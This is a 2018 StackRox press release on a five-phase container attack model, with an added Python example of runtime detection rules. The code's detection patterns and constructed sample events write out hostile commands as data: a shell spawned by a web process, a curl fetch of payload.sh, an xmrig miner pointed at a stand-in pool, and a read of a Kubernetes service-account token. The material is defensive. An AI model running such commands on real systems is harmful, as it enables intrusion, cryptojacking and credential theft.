StackRox AIM Uses Five Phases of Attacks to Stop Threats in Enterprise Container Runtime Environments
MOUNTAIN VIEW, Calif. – January 31, 2018 – Today StackRox announced StackRox Detect and Respond 2.0, enhancing its threat detection capabilities across the five phases of container attacks defined by the new StackRox AIM. With expanded depth and breadth of threat detection, auto-tuned machine learning, and application auto-grouping, StackRox Detect and Respond 2.0 enables customers to get ahead of threats aimed at their Docker containers running in production with greater ease and efficiency.
“Container usage for production deployments in enterprises is still constrained by concerns around security, monitoring, data management, networking and orchestration,” wrote Arun Chandrasekaran and Dennis Smith, Gartner research VPs in Best Practices for Running Containers in Production.* StackRox Detect and Respond deploys using a customer’s existing tools and orchestrator, running alongside containerized applications to continuously monitor and protect containers from threats.
StackRox’s research and development with Docker, Google, and large enterprises in the area of container runtime security has culminated in StackRox AIM, a five-phase threat model that underlies the company’s detection strategy for surfacing attacks. By examining application deployments through an attacker’s lens, StackRox exposes threats by fusing together signals from container environments that correspond to the five iterative phases of an attack’s lifecycle. The new detection capabilities within each of these categories include:
- Foothold. Reverse shell invocation following a generic initial exploitation vector (e.g., web or network-based exploits); Java-based code injection attacks.
- Privilege Escalation. Execution of setuid/setgid by non-root users.
- Persistence. Database persistence via posting of database procedures; user persistence via modification of PAM configurations.
- Lateral Movement. Anomalous network communication with a client followed by payload execution or unexpected process cloning.
- Objectives. Cryptocurrency mining software; exfiltration of sensitive content via reading stored secrets or accessing confidential file paths.
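To make the five phases concrete, here is an added illustration of how runtime telemetry can be mapped onto them. This is example code written for this page, not StackRox’s own detection logic; the event schema, the baseline format, the shell/web-frontend lists, the mining indicators and the five-second lateral-movement window are all assumptions, and the sample events are constructed rather than captured from a real environment.

```python
"""Toy rule set mapping container runtime events onto the five AIM phases.

Added example, not StackRox code. Assumed event schema: each event is a dict
with "ts" (seconds), "type" (exec | file_write | file_open | net_accept),
"container", "pid", "uid", plus type-specific fields (comm/argv/parent_comm/
file_mode for exec, path for file_*, src for net_accept).
"""
import re

SHELLS = {"sh", "bash", "dash", "zsh"}
# Processes that normally face the network in a web workload (assumed).
WEB_FRONTENDS = {"java", "nginx", "node", "httpd"}
PAM_PATHS = ("/etc/pam.d/", "/etc/pam.conf")
SECRET_PATHS = ("/run/secrets/", "/var/run/secrets/kubernetes.io/serviceaccount/")
MINER_RE = re.compile(r"stratum\+tcp://|xmrig|minerd|cryptonight", re.I)
SETUID_OR_SETGID = 0o6000          # S_ISUID | S_ISGID
LATERAL_WINDOW = 5.0               # seconds from inbound connection to follow-on exec


def classify(events, baseline):
    """Return [(phase, detail), ...] for events matching an AIM phase.

    baseline: {container: set(binary names seen during learning)}. It stands in
    for the product's auto-tuned baselines; anything outside it is "unexpected".
    """
    findings = []
    recent_accept = {}              # container -> ts of latest inbound connection
    for ev in sorted(events, key=lambda e: e["ts"]):
        kind = ev["type"]
        if kind == "net_accept":
            recent_accept[ev["container"]] = ev["ts"]
        elif kind == "exec":
            comm, argv = ev["comm"], " ".join(ev["argv"])
            # Foothold: a shell spawned by a web-facing parent, or wired to /dev/tcp
            if comm in SHELLS and (ev.get("parent_comm") in WEB_FRONTENDS or "/dev/tcp/" in argv):
                findings.append(("Foothold", f"reverse shell: {argv}"))
            # Privilege escalation: non-root user executes a setuid/setgid binary
            if ev["uid"] != 0 and ev.get("file_mode", 0) & SETUID_OR_SETGID:
                findings.append(("Privilege Escalation", f"setuid/setgid exec by uid {ev['uid']}: {comm}"))
            # Lateral movement: inbound connection, then an off-baseline exec shortly after
            t0 = recent_accept.get(ev["container"])
            if t0 is not None and ev["ts"] - t0 <= LATERAL_WINDOW and comm not in baseline.get(ev["container"], set()):
                findings.append(("Lateral Movement", f"payload after inbound connection: {argv}"))
                recent_accept.pop(ev["container"])   # one alert per accepted connection
            # Objectives: cryptocurrency mining
            if MINER_RE.search(argv):
                findings.append(("Objectives", f"cryptominer: {argv}"))
        elif kind == "file_write" and ev["path"].startswith(PAM_PATHS):
            findings.append(("Persistence", f"PAM config modified: {ev['path']}"))
        elif kind == "file_open" and ev["path"].startswith(SECRET_PATHS):
            findings.append(("Objectives", f"secret read: {ev['path']}"))
    return findings


# Constructed sample telemetry (not real data) walking through all five phases.
SAMPLE_EVENTS = [
    {"ts": 1.0, "type": "exec", "container": "web", "pid": 101, "uid": 1000,
     "comm": "bash", "argv": ["bash", "-i"], "parent_comm": "java", "file_mode": 0o755},
    {"ts": 2.0, "type": "exec", "container": "web", "pid": 102, "uid": 1000,
     "comm": "su", "argv": ["su", "-"], "parent_comm": "bash", "file_mode": 0o4755},
    {"ts": 3.0, "type": "file_write", "container": "web", "pid": 102, "uid": 0,
     "path": "/etc/pam.d/su"},
    {"ts": 10.0, "type": "net_accept", "container": "db", "pid": 201, "uid": 999,
     "src": "10.0.0.12"},
    {"ts": 11.5, "type": "exec", "container": "db", "pid": 210, "uid": 999,
     "comm": "curl", "argv": ["curl", "http://10.0.0.12/payload.sh"], "parent_comm": "sh", "file_mode": 0o755},
    {"ts": 12.0, "type": "exec", "container": "db", "pid": 211, "uid": 999,
     "comm": "xmrig", "argv": ["xmrig", "-o", "stratum+tcp://pool.example:3333"], "parent_comm": "sh", "file_mode": 0o755},
    {"ts": 13.0, "type": "file_open", "container": "db", "pid": 211, "uid": 999,
     "path": "/var/run/secrets/kubernetes.io/serviceaccount/token"},
    {"ts": 20.0, "type": "exec", "container": "web", "pid": 120, "uid": 1000,
     "comm": "java", "argv": ["java", "-jar", "app.jar"], "parent_comm": "tini", "file_mode": 0o755},
]
BASELINE = {"web": {"java", "tini"}, "db": {"postgres"}}   # assumed learned baselines

if __name__ == "__main__":
    for phase, detail in classify(SAMPLE_EVENTS, BASELINE):
        print(f"[{phase}] {detail}")
```

The benign `java` exec at the end produces no finding because it sits in the web container’s baseline and follows no inbound connection; everything the rules fire on depends on that baseline, which is why auto-tuned baselines matter as much as the rules themselves.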
“We’ve worked closely with our enterprise customers to help protect them against the new landscape of threats in container environments. Together we developed StackRox AIM as a new methodology to protect them from threats,” said Sameer Bhalotra, co-founder and CEO of StackRox. “With the new capabilities in StackRox Detect and Respond 2.0, enterprises running containers in production can get ahead of attackers and limit the blast radius of attacks.”
StackRox Detect and Respond 2.0 now includes:
- Expanded threat detection. New capabilities as described above to increase the depth and breadth of threat detection based on StackRox AIM.
- Auto-tuned machine learning. StackRox now automates learning from security events, establishing baselines so it can alert on anomalous activity as potential indicators of compromise (IOCs).
- Extended integration with container orchestrators. StackRox leverages user-defined data from the orchestrator to automatically group services within applications, eliminating manual work for users, and providing immediate visibility into applications.
StackRox Detect and Respond 2.0 is scheduled for general availability in Q1 2018.
- Deep dive into StackRox Detect and Respond 2.0
- StackRox AIM brief
- Sign up for our Webcast: Building an enterprise container security strategy with StackRox
- Learn more about StackRox
- Connect with StackRox at stackrox.com, Twitter, LinkedIn, and Facebook
*Gartner, Best Practices for Running Containers in Production, by Arun Chandrasekaran and Dennis Smith, 25 July 2017.
Founded in 2014, StackRox helps enterprises secure their cloud-native applications at scale. StackRox is the industry’s first detection and response platform that defends containers and microservices from new threats. StackRox enables security teams to visualize the container attack surface, expose malicious activity, and stop the attacker kill chain. It combines a new security architecture, machine learning, and protective actions to disrupt attacks in real time and limit their impact. StackRox is the choice of Global 2000 enterprises and backed by Sequoia Capital.